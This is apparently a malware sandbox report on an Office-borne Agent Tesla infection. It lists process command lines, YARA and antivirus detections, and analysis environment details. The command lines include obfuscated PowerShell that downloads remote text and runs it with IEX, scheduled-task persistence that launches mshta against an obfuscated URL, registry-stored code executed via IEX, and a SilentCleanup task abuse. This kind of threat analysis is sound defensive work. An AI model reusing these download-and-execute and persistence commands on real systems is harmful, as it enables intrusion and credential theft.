powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /create /sc MINUTE /mo 80 /tn ""BlueStacksIUptad"" /F /tr ""\""MsHtA http://1230948%[email protected]/p/9.html\""

SUSPICIOUS

powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hIÈ`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Cre... ...-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt').GetResponse().GetResponseStream()).ReadToend());

SUSPICIOUS

powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING ='(Nè`<^_^>t`.Wè'.Replace('<^_^>','w-Object Ne');$alosh='b... ...9a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt'')';$YOUTUBE=IÈ`X ($NOTHING,$alosh,$Dont -Join '')|IÈ`X

SUSPICIOUS

schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 80 /tn BlueStacksIUptad /F /tr"MsHtA http://1230948%[email protected]/p/9.html"

SUSPICIOUS

mshta.exe C:\Windows\system32\MsHtA.EXE http://1230948%[email protected]/p/9.html SUSPICIOUS

aspnet_compiler.exe #cmd SUSPICIOUS



Process Name Commandline Verdict

powerpnt.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" CLEAN

outlook.exe "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding CLEAN

svchost.exe C:\Windows\system32\svchost.exe -k netsvcs CLEAN

wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding CLEAN

taskeng.exetaskeng.exe {4AF814F3-B5F2-456B-9FF3-B4FF2E8485C0}S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\kEecfMwgj:Interactive:LUA[1]

CLEAN

aspnet_compiler.exe #Powershell CLEAN

wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs" CLEAN

powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicyUnrestricted -File C:\Users\Public\run.ps1

CLEAN

schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I CLEAN

powershell.exe powershell.exe ((gp HKCU:\Software).cookerr)|IEX CLEAN

wscript.exe"C:\Windows\System32\WScript.exe" "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\OneDrive.vbs"

CLEAN

powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicyUnrestricted -File C:\Users\Public\msi.ps1

CLEAN



YARA / AV

YARA (1)

Ruleset Name Rule Name Rule Description File Type File Name Classification Verdict

Antivirus (1)

File Type Threat Name File Name Verdict

MalwareAgentTesla_StringDecryption_v3

Agent Tesla v3 string decryption Memory Dump - Spyware 5/5

Downloaded File VB:Trojan.Valyria.4205 - MALICIOUS



ENVIRONMENT

Virtual Machine Information

Analyzer Information

Software Information

Name win7_64_sp1_en_mso2016

Description win7_64_sp1_en_mso2016

Architecture x86 64-bit

Operating System Windows 7

Kernel Version 6.1.7601.18741 (2e37f962-d699-492c-aaf3-f9f4e9770b1d)

Network Scheme Name Local Gateway

Network Config Name Local Gateway

Analyzer Version 4.2.2

Dynamic Engine Version 4.2.2 / 07/23/2021 03:44

Static Engine Version 4.2.2.0

Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (March 15, 2021)

Built-in AV Database Update ReleaseDate

2021-08-09 09:51:18+00:00

AV Exceptions Version 4.2.2.54 / 2021-07-23 03:00:10

VTI Ruleset Version 4.2.2.31 / 2021-07-19 18:52:40

YARA Built-in Ruleset Version 4.2.2.32

Link Detonation Heuristics Version -

Signature Trust Store Version 4.2.2.54 / 2021-07-23 03:00:10

Analysis Report Layout Version 10

Adobe Acrobat Reader Version Not installed

Microsoft Office 2016

Microsoft Office Version 16.0.4266.1003

Internet Explorer Version 8.0.7601.17514

Chrome Version Not installed

Firefox Version Not installed

Flash Version Not installed

Java Version Not installed
